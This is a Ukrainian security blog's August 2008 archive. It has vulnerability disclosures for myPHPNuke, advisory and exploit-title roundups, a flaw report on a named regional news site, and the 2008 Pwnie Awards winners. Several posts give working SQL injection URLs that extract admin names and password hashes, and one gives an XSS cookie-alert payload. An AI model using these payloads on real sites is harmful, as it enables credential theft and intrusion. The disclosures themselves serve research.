Архів за Серпень, 2008

SQL Injection уразливість в myPHPNuke

23:58 30.08.2008

Нещодавно, 24.08.2008, я знайшов SQL Injection уразливість в системі myPHPNuke. Дірку я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про знайдені мною уразливості в myPHPNuke.

SQL Injection:

http://site/printfeature.php?artid=-1%20union%20select%20null,null,aid,pwd,null,null,null,null%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії наявні додаткові фільтри). При цьому остання версія системи також уразлива - в ній можлива обмежена SQL Injection атака.

Практики управління безпекою

22:48 30.08.2008

В своїй презентації Security Management Practices, Ben Rothke розповідає про сучасні практики управління безпекою. Він торкається різних аспектів процесу управління безпекою.

Численні уразливості в Microsoft Internet Explorer

20:26 30.08.2008

В минулому році були виявлені численні уразливості в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6 та Internet Explorer 7 на Windows 2000 Server, Windows 2000 Professional, Windows XP, Windows 2003 Server, Windows Vista.

Виявлені численні пошкодження пам’яті.

  • Microsoft Internet Explorer JavaScript setExpression Heap Corruption Vulnerability (деталі)
  • Microsoft Internet Explorer setExpression Vulnerability (деталі)
  • Microsoft Internet Explorer Node Manipulation Memory Corruption (деталі)
  • Microsoft Internet Explorer Element Tags Vulnerability (деталі)
  • Microsoft Security Bulletin MS07-069 - Critical Cumulative Security Update for Internet Explorer (942615) (деталі)

Добірка уразливостей

16:34 30.08.2008

В даній добірці уразливості в веб додатках:

  • drupal Zend Hash Del Key Or Index php injection (деталі)
  • SAP DB Web Server Stack Overflow (деталі)
  • SAP Message Server Heap Overflow (деталі)
  • Sitebar 3.3.5 (index.php writerFile)Remote File Include Vulnerabilities (деталі)
  • Pixaria Gallery 1.0 (class.Smarty.php) Remote File Include Vulnerability (деталі)
  • Back-End CMS Database Tables v0.4.7 Cross Site Scripting (деталі)
  • bloofoxCMS 0.2.2 Cross Site Scripting (деталі)
  • MobilePublisherphp v1.1.2 Remote File Include Vulnerabilities (деталі)
  • FloweRS v2.0 Cross Site Scripting (деталі)
  • Back-End CMS Database Tables v0.4.7 Remote File Include Vulnerabilities (деталі)

Нова SQL Injection уразливість в myPHPNuke

23:58 29.08.2008

Сьогодні, 29.08.2008, після знайдення попередніх уразливостей в myPHPNuke, я знайшов нову SQL Injection уразливість в системі myPHPNuke. Дірку я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

SQL Injection:

http://site/article.php?sid=-1%20union%20select%20null,null,null,null,aid,pwd,null,null,null%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії системи наявні додаткові фільтри). При цьому остання версія також уразлива - при відключених magic quotes в ній можлива обмежена SQL Injection атака.

Численні уразливості в Mozilla Firefox, Thunderbird, Seamonkey

22:41 29.08.2008

В минулому році були виявлені численні уразливості в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox 2.0, Thunderbird 2.0, Seamonkey 1.1, xulrunner 1.8, iceweasel 2.0.

Виконання коду, ушкодження пам’яті, підміна вмісту, міжсайтовий скриптінг, DoS.

  • Mozilla Foundation Security Advisory 2007-25 (деталі)
  • Mozilla Foundation Security Advisory 2007-22 (деталі)
  • Mozilla Foundation Security Advisory 2007-21 (деталі)
  • Mozilla Foundation Security Advisory 2007-20 (деталі)
  • Mozilla Foundation Security Advisory 2007-19 (деталі)
  • Mozilla Foundation Security Advisory 2007-18 (деталі)
  • US-CERT Technical Cyber Security Alert TA07-199A — Mozilla Updates for Multiple Vulnerabilities (деталі)

Уразливості на inform.pl.ua

21:24 29.08.2008

21.04.2008

У серпні, 04.09.2007, а також додатково сьогодні, я знайшов Full path disclosure та Cross-Site Scripting уразливості на проекті http://inform.pl.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

29.08.2008

Сайт змінив свій домен з http://inform.pl.ua на http://poltava.info (і зі старого домена відбувається редирект на новий).

Full path disclosure:

http://inform.pl.ua/goroda.php

http://inform.pl.ua/link/phone.php

http://inform.pl.ua/link/confirm_image.php

http://inform.pl.ua/link/menu.php

XSS:

Дані уразливості вже виправлені. Але замість старої XSS дірки в пошуці була зроблена нова XSS в пошуці по сайту. На оновленому сайті http://poltava.info був розміщений новий локальний пошуковець - Користувацький пошук Гугла, також відомий як Google Custom Search Engine, про дірку в якому я писав (подібне й має місце на даному сайті).

XSS:

Добірка експлоітів

16:18 29.08.2008

В даній добірці експлоіти в веб додатках:

  • EQDKP 1.3.2f (user_id) Authentication Bypass (PoC) (деталі)
  • AJ HYIP ACME (topic_detail.php id) Remote SQL Injection Vulnerability (деталі)
  • Advanced Image Hosting (AIH) 2.1 Remote SQL Injection Exploit (деталі)
  • Linkspile (link.php cat_id) Remote SQL Injection Vulnerability (деталі)
  • The Real Estate Script (dpage.php docID) SQL Injection Vulnerability (деталі)
  • EMO Realty Manager (news.php ida) SQL Injection Vulnerability (деталі)
  • Rgboard <= 3.0.12 (RFI/XSS) Multiple Remote Vulnerabilities (деталі)
  • La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit (деталі)
  • Internet Photoshow (Special Edition) Insecure Cookie Handling Vuln (деталі)
  • ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access (деталі)

XSS та SQL Injection уразливості в myPHPNuke

23:52 28.08.2008

Нещодавно, 24.08.2008, я знайшов Cross-Site Scripting та SQL Injection уразливості в системі myPHPNuke. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в myPHPNuke.

XSS:

http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1

Хоча до SQL Injection уразлива і myPHPNuke 1.8.8_8rc2, але в ній наявні додаткові фільтри, тому для проведення SQL Injection (а також XSS) потрібна попередня версія системи. Тому уразливі версії до myPHPNuke 1.8.8_8rc2 (а в останній версії системи можлива обмежена SQL Injection атака).

Переможці Pwnie Awards

22:46 28.08.2008

Нещодавно були оголошені переможці Pwnie Awards 2008 - Pwnie Award Winners. Вручення нагород пройшло 6 серпня, а 20 серпня імена переможців в усіх категоріях було оприлюднено на сайті.

До речі, на сайті розміщений відео запис церемонії вручення премій. Тому громадськість зможе побачити нагороджених хакерів в обличчя ;-) .

Цьогорічні переможці Pwnie Awards.

Pwnie for Best Server-Side Bug:

  • Windows IGMP kernel vulnerability (Alex Wheeler та Ryan Smith)

Pwnie for Best Client-Side Bug:

  • Multiple URL protocol handling flaws (Nate McFeters, Rob Carter та Billy Rios)

Pwnie for Mass 0wnage (також відома як “Pwnie for Breaking the Internet”):

  • An unbelievable number of WordPress vulnerabilities (everybody who cared to look) - до даної номінації я безпосередньо причетний 8-) (так і відчував, що цей номінант стане переможцем в даній категорії)

Pwnie for Most Innovative Research:

  • Lest We Remember: Cold Boot Attacks on Encryption Keys (J. Alex Halderman, Seth Schoen, Nadia Heninger, William Clarkson, William Paul, Joseph Calandrino, Ariel Feldman, Rick Astley, Jacob Appelbaum, Edward Felten)
  • Honorable mention: Defeating a VM packer with a decompiler written in OCaml (Rolf Rolles)

Lamest Vendor Response:

  • McAfee’s “Hacker Safe” certification program - XSS уразливості на багатьох сайтах, що сертифіковані як “Hacker Safe” (учора я як раз писав про такий випадок)

Pwnie for Most Overhyped Bug:

  • Unspecified DNS cache poisoning vulnerability (Dan Kaminsky)

Pwnie for Best Song:

  • Packin’ The K! (K & Key, Kaspersky Labs)

Pwnie for Most Epic FAIL:

  • Debian for shipping a backdoored OpenSSL library for two years (Debian Project)
  • Honorable mention: Windows Vista for proving that security does not sell

Lifetime Achievement Award:

  • Tim Newsham